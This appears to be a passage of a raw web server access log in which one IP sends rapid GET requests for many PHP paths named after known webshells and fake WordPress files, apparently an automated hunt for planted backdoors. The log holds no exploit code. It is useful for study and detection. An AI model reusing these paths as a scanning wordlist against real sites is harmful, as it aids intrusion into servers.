[16/Sep/2024:10:13:20 +0700] "GET /css/colors/blue/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:21 +0700] "GET /class-wp-session-href.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:21 +0700] "GET /wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:21 +0700] "GET /css/colors/midnight/vitoria.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:21 +0700] "GET /themes/alera/gecko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:22 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:22 +0700] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:13:22 +0700] "GET /images/cmd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:22 +0700] "GET /selectrss/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:13:23 +0700] "GET /ID3getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:23 +0700] "GET /uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:23 +0700] "GET /Files/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:13:23 +0700] "GET /pki-validation/xmlelement-settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:23 +0700] "GET /pki-validation/db-update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:24 +0700] "GET /css/dist/wp-the1me.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:24 +0700] "GET /plugins/akismet/views/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:24 +0700] "GET /acme-challenge/inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:24 +0700] "GET /Text/options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:25 +0700] "GET /plugins/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:25 +0700] "GET /plugins/elementor/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:25 +0700] "GET /css/colors/modern/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:25 +0700] "GET /uploads/bak.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:26 +0700] "GET /991176.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:26 +0700] "GET /plugins/pwnd/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:26 +0700] "GET /uploads/cache.cleaner.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:26 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:13:27 +0700] "GET /uploads/2020/09/eknlmor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:27 +0700] "GET /rest-api/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:27 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:13:27 +0700] "GET /css/colors/blue/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:27 +0700] "GET /images/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:28 +0700] "GET /theme-compat/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:28 +0700] "GET /plugins/wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:28 +0700] "GET /pki-validation/zabi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:28 +0700] "GET /user/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:29 +0700] "GET /themes/twenty/twenty.php/xx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:29 +0700] "GET /ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:29 +0700] "GET /acme-challenge/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:29 +0700] "GET /uploads/wpr-addons/forms/ss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:30 +0700] "GET /g4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:30 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:30 +0700] "GET /css/wrapper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:30 +0700] "GET /plugins/hellopress/wp_mna.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:31 +0700] "GET /js/l0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:31 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:31 +0700] "GET /ID3/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:31 +0700] "GET /hello.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:31 +0700] "GET /plugins/fix/www.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:32 +0700] "GET /Text/mCBlbb.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:32 +0700] "GET /js/widgets/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:32 +0700] "GET /lnbgpdvr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:32 +0700] "GET /js/widgets/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 156.146.33.76 - - [16/Sep/2024:10:13:33 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:33 +0700] "GET /rss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:33 +0700] "GET /uploads/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:33 +0700] "GET /js/codemirror/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:34 +0700] "GET /maint/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:34 +0700] "GET /iedevrth.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:13:34 +0700] "GET /plugins/seoplugins/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:34 +0700] "GET /uploads/2020/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:35 +0700] "GET /uploads/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:35 +0700] "GET /ms-default-constants-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:35 +0700] "GET /footersysm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:35 +0700] "GET /plugins/abtest/abtest_admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:35 +0700] "GET /block-supports/duotones.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:36 +0700] "GET /plugins/seoplugins/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:36 +0700] "GET /includes/index1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:36 +0700] "GET /wp-content/plugins/hermes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 156.146.33.76 - - [16/Sep/2024:10:13:36 +0700] "GET /includes/css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:37 +0700] "GET /SimplePie/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:37 +0700] "GET /rest-api/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:37 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:37 +0700] "GET /pekok.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:38 +0700] "GET /images/thumbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:38 +0700] "GET /plugins/pwnd/fai.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:38 +0700] "GET /fonts/rk2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:38 +0700] "GET /network/checkbex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:39 +0700] "GET /plugins/pwnd/1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:39 +0700] "GET /cheeshot.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 156.146.33.76 - - [16/Sep/2024:10:13:39 +0700] "GET /moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:39 +0700] "GET /news/gale.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:39 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:40 +0700] "GET /wp-style-functions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:40 +0700] "GET /images/upfile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:40 +0700] "GET /images/3374efa125.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:40 +0700] "GET /plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 156.146.33.76 - - [16/Sep/2024:10:13:41 +0700] "GET /themes/evita/issue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:41 +0700] "GET /plugins/ph-file-manager/wp-file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:41 +0700] "GET /pki-validation/validation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:41 +0700] "GET /uploads/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:42 +0700] "GET /classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:42 +0700] "GET /js/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:42 +0700] "GET /pki-validation/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:42 +0700] "GET /Requests/Text/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 156.146.33.76 - - [16/Sep/2024:10:13:43 +0700] "GET /uploads/error_log.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 156.146.33.76 - - [16/Sep/2024:10:13:43 +0700] "GET /pomo/conf-php.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:43 +0700] "GET /SimplePie/Cache/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:43 +0700] "GET /wp-admin/config.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:13:43 +0700] "GET /js/Files/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:44 +0700] "GET /upload_form.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 156.146.33.76 - - [16/Sep/2024:10:13:44 +0700] "GET /task.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 156.146.33.76 - - [16/Sep/2024:10:13:44 +0700] "GET /mu-plugins/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:44 +0700] "GET /bsbdoaro.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:45 +0700] "GET /plugins/ova-back.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:45 +0700] "GET /wp-includes/admin-bar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:45 +0700] "GET /uploads/wp-dbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:45 +0700] "GET /pki-validation/fierza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:46 +0700] "GET /wp-includes/classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:46 +0700] "GET /themes/sketch/404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 156.146.33.76 - - [16/Sep/2024:10:13:46 +0700] "GET /plugins/revslider/includes/external/page/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 156.146.33.76 - - [16/Sep/2024:10:13:46 +0700] "GET /js/tinymce/wp-includes/js/tinymce/wp-tinymce.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 156.146.33.76 - - [16/Sep/2024:10:13:47 +0700] "GET /phpunit/phpunit/src/Util/PHP/wpx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 156.146.33.76 - - [16/Sep/2024:10:13:47 +0700] "GET /uploads/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 156.146.33.76 - - [16/Sep/2024:10:13:47 +0700] "GET /plugins/seoo/masfix.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; 